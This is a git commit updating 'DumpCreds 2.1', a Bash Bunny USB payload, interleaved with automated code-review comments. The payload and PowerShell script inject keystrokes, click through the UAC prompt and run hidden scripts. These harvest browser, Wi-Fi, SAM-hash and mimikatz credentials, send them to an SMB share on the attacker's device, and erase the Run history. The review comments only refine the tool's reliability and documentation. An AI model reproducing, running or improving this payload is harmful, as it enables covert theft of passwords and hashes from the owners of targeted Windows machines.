Updated DumpCreds for bunny fw v1.1 (#168)
* DumpCreds Version 2.1 - new payload.txt special for BashBunny FW 1.1 - minor changes in main.ps1 - insert some code for debugging
* Updated because new fork sync
* new payload.txt special for BashBunny FW 1.1 + minor changes in main.ps1 + insert some code for debugging

pull/187/head
parent 7534270a7a
commit 2d651c75f0
@ -1,22 +1,34 @@
# DumpCreds 2.0
# DumpCreds 2.1
* Author: QDBA
* Version: Version 2.0.2 Build 1003
* Target: Windows
* Version: Version 2.1.0 Build 1004
* Target: Windows 10

## Description

** !!!!! works only at Bash Bunny with FW 1.1 !!!!! **

Dumps the usernames & plaintext passwords from
- Browsers (Crome, IE, FireFox)
- Wifi
- SAM Hashes (only if AdminMode=True)
- Mimimk@tz Dump (only if AdminMode=True)
- Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist)
* Browsers (Crome, IE, FireFox)
* Wifi
* SAM Hashes (only if AdminMode=True)
* Mimimk@tz Dump (only if AdminMode=True)
* Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist)

without
- Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock)
- Internet connection (becaus Firewall ContentFilter Blocks the download sites)
* Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock)
* Internet connection (becaus Firewall ContentFilter Blocks the download sites)


# Problems
- if you first use the payload on a computer, it will take some time and tries until the drivers are successfully loaded.
- If the payload doesnt work. (Red LED or Yellow LED blinks 2 or 4 times) plug off the BB and try it once more (can take 3 or 4 times)
- If the payload stops working yellow LED blinks very fast longer than 2min. You get no white LED. Your run in a time out.
If you plugin the BB every payload has 1min 30sfor doing the job. At 1min 30s every payload stops. (Thats a FW 1.1 issue)

# Debug
If you want some debug information, create a file with name "DEBUG" in the payload folder
you got the debug information in \loot\DumpCred_2.1\log.txt Folder


## Configuration

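Review bot: '# Problems' and '# Debug' are H1 headings while every other section of this README uses H2 ('## Description', '## Configuration', '## Requirements'), so they render on the same level as the document title; make them '## Problems' and '## Debug'. In the Debug section, '\loot\DumpCred_2.1\log.txt Folder' names a file, not a folder, and the sentence should say what the file is: from the payload.txt changes in this same commit (`tail -f /var/log/syslog > /tmp/log.txt &` at the start, `cp /tmp/log.txt /root/udisk/loot/DumpCred_2.1/` at the end) it is a capture of the Bunny's own syslog for the whole run, so a reader should not expect target-side output in it. Smaller points: 'Version: Version 2.1.0 Build 1004' repeats the word, and 'Crome', 'ist', 'becaus', 'doesnt', '30sfor' and 'Your run in a time out' are typos worth fixing while this block is being edited.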
@ -24,11 +36,6 @@ None needed.

## Requirements

Impacket must be installed.
Install it from tools_installer payload

https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer


## Download

@ -38,23 +45,45 @@ https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCred

## Install

Copy payload.txt, main.ps1 and the complete PS Folder to your favorite switch direcrory.
1. Put Bash Bunny in arming mode

2. Coppy All Folders into the root of Bunny Flash Drive
Mandatory
* payloads/library/DumpCreds_2.1 --> the payload Files
* payloads/library/DumpCreds_2.1/PS --> the Powershell scripts for the payload
* tools --> impacket tools (provide the smbserver.py) (not neccessary if you had already installed)
Not neccessary
* docs --> this doc file
* languages --> languauge files for DUCKY_LANG

3. eject Bash Bunny safely!!

4. Insert Bash Bunny in arming mode ( Impacket and languages will be installed )

5. Put all Files and Folders to payload from payloads /payloads/library/DumpCreds_2.1 to payloads/switch1 or payloads/switch2

6. eject Bash Bunny safely

7. move switch in right position

8. plugin Bash Bunny and have fun....! :-)


## STATUS

| LED | Status |
| ------------------ | -------------------------------------------- |
| White | Give drivers some time for installation |
| Red Blink Fast | Impacket not found |
| Red Blink Slow | Target did not acquire IP address |
| Amber Blink Fast | Initialization |
| Amber | HID Stage |
| Purple Blink Fast | Wait for IP coming up |
| Purple Blink Slow | Wait for Handshake (SMBServer Coming up) |
| Purple / Amber | Powershell scripts running |
| RED | Error in Powershell Scripts |
| ----------------------- | -------------------------------------------- |
| Magenta Solid | Setup |
| Red slow blink | Impacket not found |
| Red fast blink | Target did not acquire IP address |
| Yellow single blink | Initialization |
| Yellow double blink | HID Stage |
| Yellow triple blink | Wait for IP coming up |
| Yellow quad blink | Wait for Handshake (SMBServer Coming up) |
| Yellow very fast blink | Powershell scripts running |
| White fast blink | Cleanup, copy Files to <root>/loot |
| Green | Finished |
| ------------------ | -------------------------------------------- |
| ----------------------- | -------------------------------------------- |


## Discussion
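Review bot: The STATUS table ends with two stray separator rows (`| ------------------ | ... |` and `| ----------------------- | ... |`) after the `| Green | Finished |` row; Markdown only treats the row directly under the header as a separator, so these render as rows of dashes and should be deleted. The new rows also disagree with the payload.txt header comment in this same commit: the README lists 'Yellow quad blink' for the handshake wait and 'Yellow very fast blink' for scripts running, while payload.txt's OPTIONS block says 'Cyan inv single blink' and 'Cyan inv quint blink' for the same states; the code calls `LED STAGE4` and `LED Y VERYFAST`, so the README is the one that matches and the payload header is the one to fix. The 'Problems' section earlier refers to 'Red LED or Yellow LED blinks 2 or 4 times', which a reader can only decode with this table, so a cross-reference from there would help. Step 2 'Coppy', 'neccessary' (twice), 'direcrory' and 'languauge' are typos.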
@ -67,13 +96,7 @@ to......

https://github.com/EmpireProject/Empire Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1, Get-ChromeCreds.ps1

## Changelog

## ToDo

- paralellize Creds gathering with PS -- check
- while Bashbunny is waiting for Target finished the script it can some other nice work. i.e. nmap the target.
(Not very useful at ths time because I'm still Admin on Computer)
- remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) (and in future)
- rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) -- check
(There is no exploitation. You will not get admin rights, but it passes sucessfully never mind if there is a Credential prompt or a UAC prompt)
- Maybe! If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain
- Complete new payload.txt code for BashBunny 1.1
- Added a lot of debug cod into the payload

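Review bot: The two items appended to '## ToDo' ('Complete new payload.txt code for BashBunny 1.1' and 'Added a lot of debug cod into the payload') describe work done in this commit, not work still to do, and '## Changelog' directly above is empty; move them there under a 2.1.0 / Build 1004 entry and fix 'cod' to 'code'. The Discussion line still names Invoke-M1m1k@tz.ps1 as the script taken from Empire, but main.ps1 in this commit now launches `$SHARE\PS\invoke-m1m1d0gz.ps1`, so the documented filename no longer matches what the payload calls; either document the rename or revert it so the README and the code agree. 'paralellize', 'ths' and 'sucessfully' are typos, and '(and in future)' is a dangling fragment.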
@ -1,7 +1,7 @@

<#
.SYNOPSIS
DumpCred 2.0
DumpCred 2.1
.DESCRIPTION
Dumps all Creds from a PC
.PARAMETER <paramName>
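Review bot: `.PARAMETER <paramName>` is the unfilled placeholder from the comment-based-help template; the script takes no parameters (the share path is hard-coded in `$SHARE` in the next hunk), so Get-Help will list a literal '<paramName>' parameter. Either delete the .PARAMETER block or fill it in, since only the version line in the synopsis was updated here.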
@ -10,8 +10,8 @@
DumpCred
#>

$_Version = "2.0.2"
$_BUILD = "1003"
$_Version = "2.1.0"
$_BUILD = "1004"

# Share on bashbunny
$SHARE="\\172.16.64.1\e"
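Review bot: `$_Version = "2.1.0"` / `$_BUILD = "1004"` is the third hand-maintained copy of the version (the README header and the payload.txt header carry the other two), and the copies had already drifted before this commit: the README and main.ps1 said Build 1003 while payload.txt said Build 1001. Keep the build number in one file and reference it from the others, or at least state in the README which one is authoritative.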
@ -70,37 +70,42 @@ $LINE3 | Add-Content $TMPFILE
Stop-Job *
Remove-Job *

# Start all Jobs as background jobs
Write-Host "Wifi-Cred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-WiFiCreds.ps1} | Out-Null
Write-Host "ChromeCred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-ChromeCreds.ps1} | Out-Null
Write-Host "IECred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-IECreds.ps1} | Out-Null
Write-Host "FireFoxCred" ; start-job -RunAs32 -ArgumentList $SHARE {param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-FoxDump.ps1} | Out-Null
Write-Host "Inventory" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-Inventory.ps1} | Out-Null
Write-Host "Wifi-Cred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-WiFiCreds.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "ChromeCred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-ChromeCreds.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "IECred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-IECreds.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "FireFoxCred" ; start-job -RunAs32 -ArgumentList $SHARE {param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-FoxDump.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "Inventory" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-Inventory.ps1} -ErrorAction SilentlyContinue | Out-Null
if ($isAdmin) {
Write-Host "Hashes" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-PowerDump.ps1} | Out-Null
Write-Host "M1m1k@tz" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-M1m1k@tz.ps1} | Out-Null
Write-Host "Hashes" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-PowerDump.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "M1m1k@tz" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\invoke-m1m1d0gz.ps1} -ErrorAction SilentlyContinue | Out-Null
}

Write-host "... Wait for end of jobs"
# Wait for all jobs
Get-Job | Wait-Job | Out-Null
Get-Job | Wait-Job

Write-host "... Receiving results"
# Receive all results
Get-Job | Receive-Job | Out-File -Append $TMPFILE




#Move TMP File to Bunny
Write-host "Moving file to bunny"
move-item $TMPFILE -Destination $FILE -Force -ErrorAction SilentlyContinue

# Cleanup
# Remove Run History
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

Write-host "... Rename CON_OK to CON_EOF"
# Rename CON_OK to CON_EOF so bunny knows that all the stuff has finished
Rename-Item -Path "$SHARE\CON_OK" -NewName "$SHARE\CON_EOF"

# Kill cmd.exe
Write-host "... Kill cmds"
# Kill cmde.exe
Stop-Process -name cmd -ErrorAction SilentlyContinue

Write-host "... Remove all Jobs"
# Remove all Jobs from Joblist
Remove-Job *

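Review bot: Adding `-ErrorAction SilentlyContinue` to each `start-job` call does not do what the placement suggests: `-ErrorAction` is a common parameter of Start-Job itself and only governs failures to create the job, while anything the child `powershell ... $SHARE\PS\*.ps1` processes write to their error stream still comes back through `Get-Job | Receive-Job` and lands in `$TMPFILE` via `Out-File -Append`. Since the commit message says this is debugging code, silencing is also the opposite of what debugging needs; if the intent is that a missing script should not abort the run, say so in a comment. Dropping `| Out-Null` from `Get-Job | Wait-Job` now writes the job objects' table to the console; in the DEBUG path of payload.txt that console is redirected to `%TEMP%\pslog.tmp`, which is presumably the point, but a comment should say so because in the non-debug path it is just noise. The renamed job target `invoke-m1m1d0gz.ps1` no longer matches the filename the README Discussion section documents. '# Kill cmde.exe' is a typo of the '# Kill cmd.exe' comment it replaces.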
@ -1,79 +1,84 @@
#!/bin/bash
#
# Title: DumpCreds 2.0
# Title: DumpCreds 2.1
# Author: QDBA
# Version: 2.0.2
# Build: 1001
# Version: 2.1.0
# Build: 1004
# Category: Exfiltration
# Target: Windows Windows 7 + 10 (Powershell)
# Target: Windows Windows 10 (Powershell)
# Attackmodes: HID, Ethernet
# !!! works only with Bash Bunny FW 1.1 and up !!!
#
#
# White................Wait for driver installation
# Red Blink Fast.......Impacket not found
# Red Blink Slow.......Target did not acquire IP address
# Amber Blink Fast.....Initialization
# Amber................HID Stage
# Purple Blink Fast....Wait for IP coming up
# Purple Blink Slow....Wait for Handshake (SMB Server Coming up)
# Purple / Amber ......Powershell scripts running
# RED..................Error in Powershell scripts
# Green................Finished
#
# OPTIONS
# LED Status
# ----------------------- + --------------------------------------------
# SETUP + Setup
# FAIL + No /tools/impacket/examples/smbserver.py found
# FAIL2 + Target did not acquire IP address
# Yellow single blink + Initialization
# Yellow double blink + HID Stage
# Yellow triple blink + Wait for IP coming up
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
# Cyan inv quint blink + Powershell scripts running
# White fast blink + Cleanup, copy Files to <root>/loot
# Green + Finished
# ----------------------- + --------------------------------------------

logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################"


###### Lets Start ####
LED SETUP

# Source bunny_helpers.sh to get environment variables
source bunny_helpers.sh

# Some Variables
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
LOOTDIR=$SWITCHDIR/loot
mkdir -p $LOOTDIR >/dev/null


# Initialization
LED R G 100


# Check for impacket. If not found, blink fast red.
if [ ! -f pentest/impacket/examples/smbserver.py ]; then
LED R 100
exit 1
# if the file DEBUG in payload folder exist, enter debug mode
if [ -f $SWITCHDIR/DEBUG ];then
DEBUG=1 # 1= Debug on / 0= Debug off
tail -f /var/log/syslog > /tmp/log.txt &
else
DEBUG=0
fi

mkdir -p $LOOTDIR

REQUIRETOOL impacket

# remove old Handshake Files
rm -f $SWITCHDIR/CON_*


# HID STAGE
# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
LED R G B
logger -t DumpCred_2.1 "### Enter HID Stage ###"
LED STAGE1
ATTACKMODE HID

Q SET_LANGUAGE DE
export DUCKY_LANG=de

# Give some time for driver installation
Q DELAY 25000
Q DELAY 5000

LED R G 100
# Launch initial cmd
Q GUI r
if [ $DEBUG -eq 1 ]; then
RUN WIN cmd
else
RUN WIN cmd /k mode con lines=1 cols=100
fi

# Launch powershell as admin (red window)
Q DELAY 1000
Q STRING cmd /k mode con lines=1 cols=180
if [ $DEBUG -eq 1 ]; then
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs"
else
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs"
fi
Q DELAY 500
Q ENTER


# Launch powershell as admin and deletes Run history
#Q GUI r
Q DELAY 1000
#Q STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=180' -Verb runAs"
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/k mode con lines=1 cols=180' -Verb runAs"
Q DELAY 500
Q ENTER

# Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o
# Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o
# Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel)

# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
# now the second powershell command goes to the admin cmd windows.
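Review bot: The OPTIONS table in the new header ('Cyan inv single blink' for the handshake wait, 'Cyan inv quint blink' for scripts running) does not describe what the body of this file does: the handshake wait calls `LED STAGE4` and the script-running wait calls `LED Y VERYFAST`, which the README STATUS table in this same commit lists as yellow quad blink and yellow very fast blink; correct the header so the two documents agree. 'SETUP', 'FAIL' and 'FAIL2' are FW 1.1 pattern names rather than colours, so the table should say what each looks like, as the README does. The DEBUG block starts `tail -f /var/log/syslog > /tmp/log.txt &` without saving `$!`, and the matching `killall tail` at the end of the file therefore kills every tail on the device rather than this one; capture the PID (`TAILPID=$!`) and `kill "$TAILPID"` instead. `mkdir -p $LOOTDIR` appears twice in the visible region (once with `>/dev/null`, once bare after the DEBUG block); one is enough. If the two older one-line '# Bypass UAC ::' comments are still present next to the new three-line version, keep only the new one.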
@ -90,59 +95,74 @@ Q ALT n
Q DELAY 500
Q ENTER

LED R G
LED STAGE2
# Wait for Bunny Ethernet and Start main.ps1 Powershell Script
Q DELAY 500
if [ $DEBUG -eq 1 ]; then
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1 9> 1> %TEMP%\pslog.tmp } }\""
else
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\""
fi
Q DELAY 1000
Q ENTER



logger -t DumpCred_2.1 "### Enter Ethernet Stage ###"
# Ethernet Tage
LED R B 1
LED STAGE3
ATTACKMODE RNDIS_ETHERNET
# Source bunny_helpers.sh to get environment variables
source bunny_helpers.sh


logger -t DumpCred_2.1 "### Start SMBServer ###"
# Start SMB Server
/pentest/impacket/examples/smbserver.py e $SWITCHDIR &
/tools/impacket/examples/smbserver.py e $SWITCHDIR &

# Give target a chance to start exfiltration
sleep 2

# Here you can do anything else except but do not change the ATTACKMODE or umount /root/udisk



GET TARGET_IP
# Check target IP address. If unset, blink slow red.
if [ -z "${TARGET_IP}" ]; then
LED R 1000
exit 1
LED FAIL2
logger -t DumpCred_2.1 "### No Target_IP ###"
logger -t DumpCred_2.1 "### Failed ###"
exit
fi
logger -t DumpCred_2.1 "### TARGET_IP: " $TARGET_IP " ###"

LED R B 1000
LED STAGE4
# Handshake Bunny and Computer
while ! [ -f $SWITCHDIR/CON_REQ ]; do
logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_REQ ###"
sleep 1
done
mv $SWITCHDIR/CON_REQ $SWITCHDIR/CON_OK
LED R B

LED Y VERYFAST
# Wait until CON_EOF - Computer set it if all is ready
while ! [ -f $SWITCHDIR/CON_EOF ]; do
LED R B
sleep 1
LED R G
sleep 1
if [ -f $SWITCHDIR/CON_ERR ]; then
rm $SWITCHDIR/CON_ERR
LED R
exit 2
fi
logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_EOF ###"
sleep 2
done
rm $SWITCHDIR/CON_EOF
sync; sleep 1; sync

LED G
LED CLEANUP
# Cleanup
logger -t DumpCred_2.1 "### cleanup and copy files ###"
if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then
mkdir -p /root/udisk/loot/DumpCred_2.1
fi
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
rmdir $LOOTDIR
rm -f $SWITCHDIR/CON_EOF

logger -t DumpCred_2.1 "######################## End payload DumpCred_2.1 ##########################"

# realy the end....
if [ $DEBUG -eq 1 ]; then
killall tail
cp /tmp/log.txt /root/udisk/loot/DumpCred_2.1/
fi

ATTACKMODE RNDIS_ETHERNET STORAGE
sync; sleep 1; sync
LED FINISH
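Review bot: The failure paths skip the debug cleanup at the end of the file: on a missing TARGET_IP (`LED FAIL2` ... `exit`) and on CON_ERR (`LED R` / `exit 2`) the script leaves before the `if [ $DEBUG -eq 1 ]` block, so `/tmp/log.txt` is never copied to loot and the background `tail -f` keeps running, which are exactly the runs where that log would be most useful. Put the copy and the kill in a function and call it before every `exit`. The CON_ERR branch also has no `logger` line, unlike the TARGET_IP branch's '### Failed ###', so the syslog records no reason for the red LED. Smaller points: '# Ethernet Tage' should read 'Stage'; if the `LED R B` / `LED R G` toggles inside the CON_EOF loop are still in the new version they override the `LED Y VERYFAST` set just before the loop, so the LED the README documents is never shown; `rm $SWITCHDIR/CON_EOF` right after the loop and `rm -f $SWITCHDIR/CON_EOF` in the cleanup block remove the same file twice; and 'Here you can do anything else except but do not change' reads like an unfinished edit.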